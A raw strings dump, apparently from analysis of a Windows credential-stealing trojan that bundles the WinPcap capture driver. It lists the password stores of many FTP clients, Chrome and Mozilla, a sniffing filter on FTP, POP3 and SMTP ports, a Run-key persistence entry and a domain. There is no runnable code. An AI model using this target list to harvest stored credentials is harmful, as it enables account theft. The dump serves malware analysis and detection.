NPF_IoControl: Error installing the BPF filter. The filter contains TME extensions, not supported on 64bit platforms.
NPF_IoControl: Error installing the BPF filter. The filter contains TME extensions, not supported on 64bit platforms.
NPF_IoControl: Operative instructions=%u
NPF_IoControl: Operative instructions=%u
KeGetCurrentIrql() == PASSIVE_LEVEL
KeGetCurrentIrql() == PASSIVE_LEVEL
e:\releases\winpcap_4_1_0_1753\winpcap\packetntx\driver\openclos.c
e:\releases\winpcap_4_1_0_1753\winpcap\packetntx\driver\openclos.c
NPF_Open: Opened Instances: %u
NPF_Open: Opened Instances: %u
NPF_Open: Opened the device, Status=%x
NPF_Open: Opened the device, Status=%x
NPF_Cleanup: Opened Instances: %u
NPF_Cleanup: Opened Instances: %u
Received on CPU %d
Received on CPU %d
HeaderBufferSize=%u, LookAheadBuffer=%p, LookaheadBufferSize=%u, PacketSize=%u
HeaderBufferSize=%u, LookAheadBuffer=%p, LookaheadBufferSize=%u, PacketSize=%u
NPF_Write: Max frame size = %u, packet size = %u
NPF_Write: Max frame size = %u, packet size = %u
NPF_Write: Another Send operation is in progress, aborting.
NPF_Write: Another Send operation is in progress, aborting.
NPF: BufferedWrite, UserBuff=%p, Size=%u
NPF: BufferedWrite, UserBuff=%p, Size=%u
e:\releases\winpcap_4_1_0_1753\winpcap\packetntx\driver\bin\i386\npf.pdb
e:\releases\winpcap_4_1_0_1753\winpcap\packetntx\driver\bin\i386\npf.pdb
ZwQueryValueKey
ZwQueryValueKey
ZwEnumerateKey
ZwEnumerateKey
ZwOpenKey
ZwOpenKey
ntoskrnl.exe
ntoskrnl.exe
HAL.dll
HAL.dll
NDIS.SYS
NDIS.SYS
0$0)02090
0$0)02090
hXXp://ocsp.verisign.com0
hXXp://ocsp.verisign.com0
"hXXp://crl.verisign.com/tss-ca.crl0
"hXXp://crl.verisign.com/tss-ca.crl0
Thawte Certification1
Thawte Certification1
0hXXp://crl.verisign.com/ThawteTimestampingCA.crl0
0hXXp://crl.verisign.com/ThawteTimestampingCA.crl0
.Class 3 Public Primary Certification Authority0
.Class 3 Public Primary Certification Authority0
2Terms of use at hXXps://VVV.verisign.com/rpa (c)041.0,
2Terms of use at hXXps://VVV.verisign.com/rpa (c)041.0,
hXXps://VVV.verisign.com/rpa01
hXXps://VVV.verisign.com/rpa01
hXXp://crl.verisign.com/pca3.crl0
hXXp://crl.verisign.com/pca3.crl0
.Class 3 Public Primary Certification Authority
.Class 3 Public Primary Certification Authority
/hXXp://CSC3-2004-crl.verisign.com/CSC3-2004.crl0D
/hXXp://CSC3-2004-crl.verisign.com/CSC3-2004.crl0D
hXXps://VVV.verisign.com/rpa0
hXXps://VVV.verisign.com/rpa0
hXXp://ocsp.verisign.com0?
hXXp://ocsp.verisign.com0?
3hXXp://CSC3-2004-aia.verisign.com/CSC3-2004-aia.cer0
3hXXp://CSC3-2004-aia.verisign.com/CSC3-2004-aia.cer0
DhXXp://crl.microsoft.com/pki/crl/products/MicrosoftCodeVerifRoot.crl0
DhXXp://crl.microsoft.com/pki/crl/products/MicrosoftCodeVerifRoot.crl0
n.aAHu
n.aAHu
`.rdata
`.rdata
@.data
@.data
@.reloc
@.reloc
L$.Qf
L$.Qf
mscoree.dll
mscoree.dll
.mixcrt
.mixcrt
KERNEL32.DLL
KERNEL32.DLL
kernel32.dll
kernel32.dll
@(#) $Header: /tcpdump/master/libpcap/scanner.l,v 1.110.2.2 2008/02/06 10:21:47 guy Exp $ (LBL)
@(#) $Header: /tcpdump/master/libpcap/scanner.l,v 1.110.2.2 2008/02/06 10:21:47 guy Exp $ (LBL)
@(#) $Header: /tcpdump/master/libpcap/savefile.c,v 1.168.2.10 2008-10-06 15:38:39 gianluca Exp $ (LBL)
@(#) $Header: /tcpdump/master/libpcap/savefile.c,v 1.168.2.10 2008-10-06 15:38:39 gianluca Exp $ (LBL)
@(#) $Header: /tcpdump/master/libpcap/pcap.c,v 1.112.2.12 2008-09-22 20:16:01 guy Exp $ (LBL)
@(#) $Header: /tcpdump/master/libpcap/pcap.c,v 1.112.2.12 2008-09-22 20:16:01 guy Exp $ (LBL)
4.1.1
4.1.1
WinPcap version %s, based on %s
WinPcap version %s, based on %s
WinPcap version %s (packet.dll version %s), based on %s
WinPcap version %s (packet.dll version %s), based on %s
@(#) $Header: /tcpdump/master/libpcap/pcap-win32.c,v 1.34.2.8 2008-05-21 22:11:26 gianluca Exp $ (LBL)
@(#) $Header: /tcpdump/master/libpcap/pcap-win32.c,v 1.34.2.8 2008-05-21 22:11:26 gianluca Exp $ (LBL)
@(#) $Header: /tcpdump/master/libpcap/optimize.c,v 1.90.2.1 2008/01/02 04:22:16 guy Exp $ (LBL)
@(#) $Header: /tcpdump/master/libpcap/optimize.c,v 1.90.2.1 2008/01/02 04:22:16 guy Exp $ (LBL)
@(#) $Header: /tcpdump/master/libpcap/nametoaddr.c,v 1.82.2.1 2008/02/06 10:21:47 guy Exp $ (LBL)
@(#) $Header: /tcpdump/master/libpcap/nametoaddr.c,v 1.82.2.1 2008/02/06 10:21:47 guy Exp $ (LBL)
@(#) $Header: /tcpdump/master/libpcap/inet.c,v 1.75.2.4 2008-04-20 18:19:24 guy Exp $ (LBL)
@(#) $Header: /tcpdump/master/libpcap/inet.c,v 1.75.2.4 2008-04-20 18:19:24 guy Exp $ (LBL)
@(#) $Header: /tcpdump/master/libpcap/grammar.y,v 1.99.2.2 2007/11/18 02:04:55 guy Exp $ (LBL)
@(#) $Header: /tcpdump/master/libpcap/grammar.y,v 1.99.2.2 2007/11/18 02:04:55 guy Exp $ (LBL)
$$$88$$$8
$$$88$$$8
"#-./0123
"#-./0123
@(#) $Header: /tcpdump/master/libpcap/gencode.c,v 1.290.2.16 2008-09-22 20:16:01 guy Exp $ (LBL)
@(#) $Header: /tcpdump/master/libpcap/gencode.c,v 1.290.2.16 2008-09-22 20:16:01 guy Exp $ (LBL)
@(#) $Header: /tcpdump/master/libpcap/fad-win32.c,v 1.15 2007/09/25 20:34:36 guy Exp $ (LBL)
@(#) $Header: /tcpdump/master/libpcap/fad-win32.c,v 1.15 2007/09/25 20:34:36 guy Exp $ (LBL)
@(#) $Header: /tcpdump/master/libpcap/etherent.c,v 1.23 2006/10/04 18:09:22 guy Exp $ (LBL)
@(#) $Header: /tcpdump/master/libpcap/etherent.c,v 1.23 2006/10/04 18:09:22 guy Exp $ (LBL)
@(#) $Header: /tcpdump/master/libpcap/bpf_image.c,v 1.27.2.1 2008/01/02 04:22:16 guy Exp $ (LBL)
@(#) $Header: /tcpdump/master/libpcap/bpf_image.c,v 1.27.2.1 2008/01/02 04:22:16 guy Exp $ (LBL)
@(#) $Header: /tcpdump/master/libpcap/bpf/net/bpf_filter.c,v 1.45.2.1 2008/01/02 04:22:16 guy Exp $ (LBL)
@(#) $Header: /tcpdump/master/libpcap/bpf/net/bpf_filter.c,v 1.45.2.1 2008/01/02 04:22:16 guy Exp $ (LBL)
@(#) $Header: /tcpdump/master/libpcap/bpf_dump.c,v 1.14.4.1 2008/01/02 04:22:16 guy Exp $ (LBL)
@(#) $Header: /tcpdump/master/libpcap/bpf_dump.c,v 1.14.4.1 2008/01/02 04:22:16 guy Exp $ (LBL)
%u %u %u %u
%u %u %u %u
{ 0x%x, %d, %d, 0xx },
{ 0x%x, %d, %d, 0xx },
[x %d]
[x %d]
#0x%x
#0x%x
4*([%d]&0xf)
4*([%d]&0xf)
M[%d]
M[%d]
(d) %-8s %-16s jt %d
(d) %-8s %-16s jt %d
jf %d
jf %d
(d) %-8s %s
(d) %-8s %s
malloc: %s
malloc: %s
PacketGetAdapterNames: %s
PacketGetAdapterNames: %s
pcap_compile cannot generate filters for a TurboCap port when the PPI linktype is used.
pcap_compile cannot generate filters for a TurboCap port when the PPI linktype is used.
unknown data link type %d
unknown data link type %d
unsupported protocol over mpls
unsupported protocol over mpls
IEEE 802.15.4 link-layer type filtering not implemented
IEEE 802.15.4 link-layer type filtering not implemented
'tcp' modifier applied to %s
'tcp' modifier applied to %s
'sctp' modifier applied to %s
'sctp' modifier applied to %s
'udp' modifier applied to %s
'udp' modifier applied to %s
'icmp' modifier applied to %s
'icmp' modifier applied to %s
'igmp' modifier applied to %s
'igmp' modifier applied to %s
'igrp' modifier applied to %s
'igrp' modifier applied to %s
'pim' modifier applied to %s
'pim' modifier applied to %s
'vrrp' modifier applied to %s
'vrrp' modifier applied to %s
'icmp6' modifier applied to %s
'icmp6' modifier applied to %s
'ah' modifier applied to %s
'ah' modifier applied to %s
'esp' modifier applied to %s
'esp' modifier applied to %s
'esis' modifier applied to %s
'esis' modifier applied to %s
'isis' modifier applied to %s
'isis' modifier applied to %s
'clnp' modifier applied to %s
'clnp' modifier applied to %s
'stp' modifier applied to %s
'stp' modifier applied to %s
'netbeui' modifier applied to %s
'netbeui' modifier applied to %s
'radio' modifier applied to %s
'radio' modifier applied to %s
'ip' modifier applied to ip6 %s
'ip' modifier applied to ip6 %s
'rarp' modifier applied to ip6 %s
'rarp' modifier applied to ip6 %s
'arp' modifier applied to ip6 %s
'arp' modifier applied to ip6 %s
'decnet' modifier applied to ip6 %s
'decnet' modifier applied to ip6 %s
unknown ip proto '%s'
unknown ip proto '%s'
unknown ether proto '%s'
unknown ether proto '%s'
unknown osi proto '%s'
unknown osi proto '%s'
'protochain' not supported with 802.11
'protochain' not supported with 802.11
unsupported proto to gen_protochain
unsupported proto to gen_protochain
'udp proto' is bogus
'udp proto' is bogus
'tcp proto' is bogus
'tcp proto' is bogus
unknown network '%s'
unknown network '%s'
unknown ether host '%s'
unknown ether host '%s'
unknown FDDI host '%s'
unknown FDDI host '%s'
unknown token ring host '%s'
unknown token ring host '%s'
unknown 802.11 host '%s'
unknown 802.11 host '%s'
unknown Fibre Channel host '%s'
unknown Fibre Channel host '%s'
only ethernet/FDDI/token ring/802.11/ATM LANE/Fibre Channel supports link-level host name
only ethernet/FDDI/token ring/802.11/ATM LANE/Fibre Channel supports link-level host name
unknown host '%s'
unknown host '%s'
unknown host '%s'%s
unknown host '%s'%s
illegal qualifier of 'port'
illegal qualifier of 'port'
unknown port '%s'
unknown port '%s'
port '%s' is tcp
port '%s' is tcp
port '%s' is sctp
port '%s' is sctp
port '%s' is udp
port '%s' is udp
illegal qualifier of 'portrange'
illegal qualifier of 'portrange'
unknown port in range '%s'
unknown port in range '%s'
port in range '%s' is tcp
port in range '%s' is tcp
port in range '%s' is sctp
port in range '%s' is sctp
port in range '%s' is udp
port in range '%s' is udp
'gateway' not supported in this configuration
'gateway' not supported in this configuration
unknown protocol: %s
unknown protocol: %s
non-network bits set in "%s mask %s"
non-network bits set in "%s mask %s"
non-network bits set in "%s/%d"
non-network bits set in "%s/%d"
invalid ip6 address %s
invalid ip6 address %s
%s resolved to multiple address
%s resolved to multiple address
mask length must be
mask length must be
ethernet addresses supported only on ethernet/FDDI/token ring/802.11/ATM LANE/Fibre Channel
ethernet addresses supported only on ethernet/FDDI/token ring/802.11/ATM LANE/Fibre Channel
unsupported index operation
unsupported index operation
IPv6 upper-layer protocol is not supported by proto[x]
IPv6 upper-layer protocol is not supported by proto[x]
only link-layer/IP broadcast filters supported
only link-layer/IP broadcast filters supported
link-layer multicast filters supported only on ethernet/FDDI/token ring/ARCNET/802.11/ATM LANE/Fibre Channel
link-layer multicast filters supported only on ethernet/FDDI/token ring/ARCNET/802.11/ATM LANE/Fibre Channel
inbound/outbound not supported on linktype %d
inbound/outbound not supported on linktype %d
libpcap was compiled without pf support
libpcap was compiled without pf support
libpcap was compiled on a machine without pf support
libpcap was compiled on a machine without pf support
802.11 link-layer types supported only on 802.11
802.11 link-layer types supported only on 802.11
frame direction supported only with 802.11 headers
frame direction supported only with 802.11 headers
aid supported only on ARCnet
aid supported only on ARCnet
no VLAN support for data link type %d
no VLAN support for data link type %d
no MPLS support for data link type %d
no MPLS support for data link type %d
'vpi' supported only on raw ATM
'vpi' supported only on raw ATM
'vci' supported only on raw ATM
'vci' supported only on raw ATM
'callref' supported only on raw ATM
'callref' supported only on raw ATM
'metac' supported only on raw ATM
'metac' supported only on raw ATM
'bcc' supported only on raw ATM
'bcc' supported only on raw ATM
'oam4sc' supported only on raw ATM
'oam4sc' supported only on raw ATM
'oam4ec' supported only on raw ATM
'oam4ec' supported only on raw ATM
'sc' supported only on raw ATM
'sc' supported only on raw ATM
'ilmic' supported only on raw ATM
'ilmic' supported only on raw ATM
'lane' supported only on raw ATM
'lane' supported only on raw ATM
'llc' supported only on raw ATM
'llc' supported only on raw ATM
'fisu' supported only on MTP2
'fisu' supported only on MTP2
'lssu' supported only on MTP2
'lssu' supported only on MTP2
'msu' supported only on MTP2
'msu' supported only on MTP2
'sio' supported only on SS7
'sio' supported only on SS7
sio value %u too big; max value = 255
sio value %u too big; max value = 255
'opc' supported only on SS7
'opc' supported only on SS7
opc value %u too big; max value = 16383
opc value %u too big; max value = 16383
'dpc' supported only on SS7
'dpc' supported only on SS7
dpc value %u too big; max value = 16383
dpc value %u too big; max value = 16383
'sls' supported only on SS7
'sls' supported only on SS7
sls value %u too big; max value = 15
sls value %u too big; max value = 15
'oam' supported only on raw ATM
'oam' supported only on raw ATM
'oamf4' supported only on raw ATM
'oamf4' supported only on raw ATM
'connectmsg' supported only on raw ATM
'connectmsg' supported only on raw ATM
'metaconnect' supported only on raw ATM
'metaconnect' supported only on raw ATM
'port' modifier applied to ip host
'port' modifier applied to ip host
'portrange' modifier applied to ip host
'portrange' modifier applied to ip host
%d-%d
%d-%d
%d.%d
%d.%d
malformed decnet address '%s'
malformed decnet address '%s'
decnet name support not included, '%s' cannot be translated
decnet name support not included, '%s' cannot be translated
%s for block-local relative jump: off=%d
%s for block-local relative jump: off=%d
malloc() failed: %s
malloc() failed: %s
%s '%s' %s
%s '%s' %s
Error when listing files: does folder '%s' exist?
Error when listing files: does folder '%s' exist?
%s '%s' %s %s
%s '%s' %s %s
[%[1234567890:.]]:%[^/]/%s
[%[1234567890:.]]:%[^/]/%s
[%[1234567890:.]]/%s
[%[1234567890:.]]/%s
%[^/:]:%[^/]/%s
%[^/:]:%[^/]/%s
%[^/]/%s
%[^/]/%s
Source type not supported
Source type not supported
getaddrinfo() %s
getaddrinfo() %s
(%s) and not (host %s and host %s and port %s and port %s) and not (host %s and host %s and port %s)
(%s) and not (host %s and host %s and port %s and port %s) and not (host %s and host %s and port %s)
not (host %s and host %s and port %s and port %s) and not (host %s and host %s and port %s)
not (host %s and host %s and port %s and port %s) and not (host %s and host %s and port %s)
TcApi.dll
TcApi.dll
TcQueryPortList
TcQueryPortList
TcFreePortList
TcFreePortList
TcPortGetName
TcPortGetName
TcPortGetDescription
TcPortGetDescription
TcPacketsBufferCreate
TcPacketsBufferCreate
TcPacketsBufferDestroy
TcPacketsBufferDestroy
TcPacketsBufferQueryNextPacket
TcPacketsBufferQueryNextPacket
TcPacketsBufferCommitNextPacket
TcPacketsBufferCommitNextPacket
Error opening TurboCap adapter: %s
Error opening TurboCap adapter: %s
Error enabling reception on a TurboCap instance: %s
Error enabling reception on a TurboCap instance: %s
Error setting the read timeout a TurboCap instance: %s
Error setting the read timeout a TurboCap instance: %s
Getting the non blocking status is not available for TurboCap ports
Getting the non blocking status is not available for TurboCap ports
Setting the non blocking status is not available for TurboCap ports
Setting the non blocking status is not available for TurboCap ports
send error: the TurboCap API does not support packets larger than 64k
send error: the TurboCap API does not support packets larger than 64k
send error: TcPacketsBufferCreate failure: %s (x)
send error: TcPacketsBufferCreate failure: %s (x)
send error: TcInstanceTransmitPackets failure: %s (x)
send error: TcInstanceTransmitPackets failure: %s (x)
send error: TcPacketsBufferCommitNextPacket failure: %s (x)
send error: TcPacketsBufferCommitNextPacket failure: %s (x)
read error, TcInstanceReceivePackets failure: %s (x)
read error, TcInstanceReceivePackets failure: %s (x)
read error, TcPacketsBufferQueryNextPacket failure: %s (x)
read error, TcPacketsBufferQueryNextPacket failure: %s (x)
TurboCap error setting the mintocopy: %s (x)
TurboCap error setting the mintocopy: %s (x)
Mode %u not supported by TurboCap devices. TurboCap only supports capture.
Mode %u not supported by TurboCap devices. TurboCap only supports capture.
TurboCap error in TcInstanceQueryStatistics: %s (x)
TurboCap error in TcInstanceQueryStatistics: %s (x)
TurboCap error in TcStatisticsQueryValue: %s (x)
TurboCap error in TcStatisticsQueryValue: %s (x)
setfilter, unable to install the filter: %s
setfilter, unable to install the filter: %s
PacketGetStats error: %s
PacketGetStats error: %s
Error opening adapter: %s
Error opening adapter: %s
Cannot determine the network type: %s
Cannot determine the network type: %s
Error calling PacketSetMinToCopy: %s
Error calling PacketSetMinToCopy: %s
Driver error: cannot set bpf filter: %s
Driver error: cannot set bpf filter: %s
PacketSetReadTimeout: %s
PacketSetReadTimeout: %s
IEEE 802.15.4 with non-ASK PHY data
IEEE 802.15.4 with non-ASK PHY data
Bluetooth HCI UART transport layer plus pseudo-header
Bluetooth HCI UART transport layer plus pseudo-header
IEEE 802.15.4
IEEE 802.15.4
IEEE 802.15.4 with Linux padding
IEEE 802.15.4 with Linux padding
Bluetooth HCI UART transport layer
Bluetooth HCI UART transport layer
Juniper Passive Monitor PIC
Juniper Passive Monitor PIC
can't perform operation on activated capture
can't perform operation on activated capture
%s: %s
%s: %s
%s is not one of the DLTs supported by this device
%s is not one of the DLTs supported by this device
DLT %d is not one of the DLTs supported by this device
DLT %d is not one of the DLTs supported by this device
That device doesn't support promiscuous mode
That device doesn't support promiscuous mode
That device doesn't support monitor mode
That device doesn't support monitor mode
That operation is supported only in monitor mode
That operation is supported only in monitor mode
Unknown error: %d
Unknown error: %d
Sending packets isn't supported on savefiles
Sending packets isn't supported on savefiles
Setting direction is not supported on savefiles
Setting direction is not supported on savefiles
error reading dump file: %s
error reading dump file: %s
truncated dump file; tried to read %u captured bytes, only got %lu
truncated dump file; tried to read %u captured bytes, only got %lu
Can't write to %s: %s
Can't write to %s: %s
%s: link-layer type %d isn't supported in savefiles
%s: link-layer type %d isn't supported in savefiles
bogus IPv6 address %s
bogus IPv6 address %s
bogus ethernet address %s
bogus ethernet address %s
illegal token: %s
illegal token: %s
illegal char '%c'
illegal char '%c'
%sUnable to get the exact error message
%sUnable to get the exact error message
%s%s (code %d)
%s%s (code %d)
%s (code %d)
%s (code %d)
Is the server properly installed on %s? connect() failed: %s
Is the server properly installed on %s? connect() failed: %s
getaddrinfo(): socket type not supported
getaddrinfo(): socket type not supported
getaddrinfo(): multicast addresses are not valid when using TCP streams
getaddrinfo(): multicast addresses are not valid when using TCP streams
Cannot retrieve the extended statistics from a file or a TurboCap port
Cannot retrieve the extended statistics from a file or a TurboCap port
PacketGetStatsEx error: %s
PacketGetStatsEx error: %s
Cannot transmit a queue to an offline capture or to a TurboCap port
Cannot transmit a queue to an offline capture or to a TurboCap port
Impossible to set user buffer while reading from a file or on a TurboCap port
Impossible to set user buffer while reading from a file or on a TurboCap port
Error: invalid size %d
Error: invalid size %d
live dump needs a physical interface supported by the NPF driver
live dump needs a physical interface supported by the NPF driver
wrong interface type. A physical interface supported by the NPF driver is needed
wrong interface type. A physical interface supported by the NPF driver is needed
e:\releases\winpcap_4_1_0_1753\winpcap\wpcap\PRJ\Release\x86\wpcap.pdb
e:\releases\winpcap_4_1_0_1753\winpcap\wpcap\PRJ\Release\x86\wpcap.pdb
WS2_32.dll
WS2_32.dll
packet.dll
packet.dll
KERNEL32.dll
KERNEL32.dll
GetProcessHeap
GetProcessHeap
GetCPInfo
GetCPInfo
GetConsoleOutputCP
GetConsoleOutputCP
wpcap.dll
wpcap.dll
> >$>(>,>
> >$>(>,>
: :$:(:,:0:4:
: :$:(:,:0:4:
7*848=8`8
7*848=8`8
?'?,?0?4?]?
?'?,?0?4?]?
3 3
3 3
.Xa6(
.Xa6(
Export
Export
system32\drivers\NPF.sys
system32\drivers\NPF.sys
SYSTEM\CurrentControlSet\Services\%s
SYSTEM\CurrentControlSet\Services\%s
\\.\%s
\\.\%s
\\.\Global\%s
\\.\Global\%s
npp\ndisnpp.dll
npp\ndisnpp.dll
e:\releases\winpcap_4_1_0_1753\winpcap\packetNtx\Dll\Project\Release\x86\Packet.pdb
e:\releases\winpcap_4_1_0_1753\winpcap\packetNtx\Dll\Project\Release\x86\Packet.pdb
VERSION.dll
VERSION.dll
NPPTools.dll
NPPTools.dll
iphlpapi.dll
iphlpapi.dll
RegOpenKeyExW
RegOpenKeyExW
RegCloseKey
RegCloseKey
RegEnumKeyW
RegEnumKeyW
RegOpenKeyExA
RegOpenKeyExA
ADVAPI32.dll
ADVAPI32.dll
ole32.dll
ole32.dll
1"1 141;1
1"1 141;1
435:5`5|5
435:5`5|5
0&10191\1
0&10191\1
9.:4:8:<:>
9.:4:8:<:>
= =@=`=|=
= =@=`=|=
: this object doesn't support resynchronization
: this object doesn't support resynchronization
StreamTransformation: this object doesn't support random access
StreamTransformation: this object doesn't support random access
CryptoMaterial: this object does not support precomputation
CryptoMaterial: this object does not support precomputation
GeneratableCryptoMaterial: this object does not support key/parameter generation
GeneratableCryptoMaterial: this object does not support key/parameter generation
PK_MessageEncodingMethod: this signature scheme does not support message recovery
PK_MessageEncodingMethod: this signature scheme does not support message recovery
/index.html
/index.html
HTTP/1.1
HTTP/1.1
text/html; charset=windows-1251
text/html; charset=windows-1251
The requested URL
The requested URL
HTTP/1.1
HTTP/1.1
Clean up all keys.
Clean up all keys.
Use next keys:
Use next keys:
REG keys[
REG keys[
Use REG keys:
Use REG keys:
Gen new port key!
Gen new port key!
Gen new job key!
Gen new job key!
Gen new list key!
Gen new list key!
/dev/index.html
/dev/index.html
No i key:
No i key:
No m key:
No m key:
No p key:
No p key:
No j key:
No j key:
No r key:
No r key:
Err in ID key: decr:
Err in ID key: decr:
Err in ID key: check
Err in ID key: check
Err in ID key: invalid
Err in ID key: invalid
goloduha.info
goloduha.info
Check Compromzed REG key:
Check Compromzed REG key:
Compromzed REG key:
Compromzed REG key:
C:\boost\include\boost-1_47\boost/exception/detail/exception_ptr.hpp
C:\boost\include\boost-1_47\boost/exception/detail/exception_ptr.hpp
Keys3
Keys3
Appkey
Appkey
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
webscanx
webscanx
hkcmd
hkcmd
firefox
firefox
em_exec
em_exec
CrashReport
CrashReport
\tmp.exe
\tmp.exe
*.exe
*.exe
explorer.exe
explorer.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Mozilla/5.0 (Windows; U; Windows NT
Mozilla/5.0 (Windows; U; Windows NT
; rv:1.9.2.17) Gecko/20110420 Firefox/3.6.17
; rv:1.9.2.17) Gecko/20110420 Firefox/3.6.17
SMTP:
SMTP:
%d.%d.%d.%d
%d.%d.%d.%d
!#$%&'* -/=?^_`{|}~
!#$%&'* -/=?^_`{|}~
.in-addr.arpa
.in-addr.arpa
: Maximum attempts exeeded
: Maximum attempts exeeded
%s, %d %s %d d:d:d %cdd
%s, %d %s %d d:d:d %cdd
dddddd
dddddd
ddddd
ddddd
x.8lx$.8lx$x@%s
x.8lx$.8lx$x@%s
----=_NextPart_d_X_.8lX..8lX
----=_NextPart_d_X_.8lX..8lX
password
password
F/c "start Ã%\
F/c "start Ã%\
&& %windir%\explorer Ã%\
&& %windir%\explorer Ã%\
%SystemRoot%\system32\shell32.dll
%SystemRoot%\system32\shell32.dll
npf.sys
npf.sys
Packet.dll
Packet.dll
( tcp dst port 21 ) or ( tcp dst port 110 ) or ( tcp dst port 25 )
( tcp dst port 21 ) or ( tcp dst port 110 ) or ( tcp dst port 25 )
smtp
smtp
pop3_smtp
pop3_smtp
HostPassword
HostPassword
HostPort
HostPort
32BitFtp.ini
32BitFtp.ini
0003DFTP
0003DFTP
3D-FTP
3D-FTP
sites.ini
sites.ini
\3D-FTP
\3D-FTP
Password
Password
Port
Port
port
port
QData.dat
QData.dat
ESTdb2.dat
ESTdb2.dat
\Estsoft\ALFTP
\Estsoft\ALFTP
TYPE = SFTP
TYPE = SFTP
sftp
sftp
SET PASS
SET PASS
bitkinex.ds
bitkinex.ds
LastPassword
LastPassword
LastPort
LastPort
BlazeFtp
BlazeFtp
site.dat
site.dat
\BlazeFtp
\BlazeFtp
Software\FlashPeak\BlazeFtp\Settings
Software\FlashPeak\BlazeFtp\Settings
*.dat
*.dat
*.bps
*.bps
Software\BPFTP
Software\BPFTP
Chrome
Chrome
PTF://
PTF://
origin_url
origin_url
password_value
password_value
logins
logins
SQLite format 3
SQLite format 3
Web Data
Web Data
Login Data
Login Data
Google\Chrome
Google\Chrome
ChromePlus
ChromePlus
Nichrome
Nichrome
MapleStudio\ChromePlus
MapleStudio\ChromePlus
browser.yandex
browser.yandex
Software\ChromePlus
Software\ChromePlus
_Password
_Password
FtpServer
FtpServer
FtpUserName
FtpUserName
FtpPassword
FtpPassword
_FtpPassword
_FtpPassword
FtpDirectory
FtpDirectory
FtpDescription
FtpDescription
Software\NCH Software\ClassicFTP\FTPAccounts
Software\NCH Software\ClassicFTP\FTPAccounts
FTP destination server
FTP destination server
FTP destination user
FTP destination user
FTP destination password
FTP destination password
FTP destination catalog
FTP destination catalog
FTP destination port
FTP destination port
FTP profiles
FTP profiles
Software\FTPWare\COREFTP\Sites
Software\FTPWare\COREFTP\Sites
ftps
ftps
CSMFTPItem
CSMFTPItem
sm.dat
sm.dat
\GlobalSCAPE\CuteFTP
\GlobalSCAPE\CuteFTP
\GlobalSCAPE\CuteFTP Pro
\GlobalSCAPE\CuteFTP Pro
\GlobalSCAPE\CuteFTP Lite
\GlobalSCAPE\CuteFTP Lite
\CuteFTP
\CuteFTP
CUTEFTP
CUTEFTP
Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar
Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar
Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar
Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar
Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar
Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar
user.config
user.config
*.duck
*.duck
Nickname
Nickname
sites.xml
sites.xml
DeluxeFTP
DeluxeFTP
FTP-Now
FTP-Now
FTPNow
FTPNow
FTP Now
FTP Now
LOGIN
LOGIN
PASSWORD
PASSWORD
PORT
PORT
*.oxc
*.oxc
*.oll
*.oll
ftplast.osd
ftplast.osd
EasyFTP
EasyFTP
SOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32
SOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32
\Plugins\FTP\Hosts
\Plugins\FTP\Hosts
\SavedDialogHistory\FTPHost
\SavedDialogHistory\FTPHost
FTPList.db
FTPList.db
DefaultPassword
DefaultPassword
Software\Sota\FFFTP
Software\Sota\FFFTP
Software\Sota\FFFTP\Options
Software\Sota\FFFTP\Options
Server.Port
Server.Port
Server.Pass
Server.Pass
Server.User
Server.User
Server.Host
Server.Host
Last Server Port
Last Server Port
Last Server Pass
Last Server Pass
Sites.dat
Sites.dat
Quick.dat
Quick.dat
History.dat
History.dat
ServerPass
ServerPass
SharedSettings.ccs
SharedSettings.ccs
SharedSettings_1_0_5.ccs
SharedSettings_1_0_5.ccs
SharedSettings.sqlite
SharedSettings.sqlite
SharedSettings_1_0_5.sqlite
SharedSettings_1_0_5.sqlite
FreshFTP
FreshFTP
*.SMF
*.SMF
FtpSite.xml
FtpSite.xml
QuickFtp
QuickFtp
FTP Commander
FTP Commander
usessh
usessh
ftplist.txt
ftplist.txt
FTP Navigator
FTP Navigator
*.prf
*.prf
FTP CONTROL
FTP CONTROL
Login
Login
PasswordType
PasswordType
CFTPToolBarComboBoxButton
CFTPToolBarComboBoxButton
profiles.xml
profiles.xml
\FTP Explorer
\FTP Explorer
Software\FTP Explorer\FTP Explorer\Workspace\MFCToolBar-224
Software\FTP Explorer\FTP Explorer\Workspace\MFCToolBar-224
Software\FTP Explorer\Profiles
Software\FTP Explorer\Profiles
ftpx
ftpx
Software\MAS-Soft\FTPInfo\Setup
Software\MAS-Soft\FTPInfo\Setup
ServerList.xml
ServerList.xml
\FTPInfo
\FTPInfo
RushSite.xml
RushSite.xml
\FTPRush
\FTPRush
FTPShell
FTPShell
ftpshell.fsi
ftpshell.fsi
servers.xml
servers.xml
\FTPGetter
\FTPGetter
server_user_password
server_user_password
server_port
server_port
SM.arch
SM.arch
GoFTP
GoFTP
Goftp Rocks 91802sfaiolpqikeu39
Goftp Rocks 91802sfaiolpqikeu39
Connections.txt
Connections.txt
MS IE FTP Passwords
MS IE FTP Passwords
pstorec.dll
pstorec.dll
advapi32.dll
advapi32.dll
sites.dat
sites.dat
unleap.exe
unleap.exe
\LeapWare\LeapFTP
\LeapWare\LeapFTP
LeechFTP Bookmark File.
LeechFTP Bookmark File.
bookmark.dat
bookmark.dat
Software\LeechFTP
Software\LeechFTP
LeechFTP
LeechFTP
LINASFTP1234567890ABCDEFGHIJKLMNOPQRSTUVWXYZ
LINASFTP1234567890ABCDEFGHIJKLMNOPQRSTUVWXYZ
Software\LinasFTP\Site Manager
Software\LinasFTP\Site Manager
Mozilla
Mozilla
nss3.dll
nss3.dll
PK11_GetInternalKeySlot
PK11_GetInternalKeySlot
sqlite3_close
